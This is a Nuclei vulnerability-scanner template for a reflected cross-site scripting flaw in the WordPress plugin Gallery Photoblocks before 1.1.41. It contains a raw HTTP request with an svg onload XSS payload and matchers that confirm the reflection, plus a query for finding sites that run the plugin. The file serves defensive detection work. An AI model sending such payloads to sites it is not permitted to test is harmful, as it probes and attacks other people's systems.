nuclei-templates/http/vulnerabilities/wordpress/photoblocks-grid-gallery-xs...

34 lines
1.3 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: photoblocks-grid-gallery-xss
info:
name: Gallery Photoblocks < 1.1.41 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Reflected Cross-Site Scripting (XSS) is a type of web vulnerability where an attacker injects malicious scripts into a website, and the injected code gets reflected back to the user's browser, executing the script in the context of the vulnerable website.
remediation: Fixed in version 1.1.41
reference:
- https://plugins.trac.wordpress.org/changeset/2117972
- https://wpscan.com/vulnerability/5c57e78a-97b9-4e23-8935-e4c9d806c89d
- https://wordpress.org/plugins/photoblocks-grid-gallery/
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/photoblocks-grid-gallery/"
tags: wordpress,wpscan,photoblocks,wp-plugin,wp,xss
http:
- raw:
- |
GET /wp-content/plugins/photoblocks-grid-gallery/admin/partials/photoblocks-edit.php?id=%22%3E%3Csvg/onload=alert(document.domain)%3E HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>")'
- 'contains(body, "PhotoBlocks")'
condition: and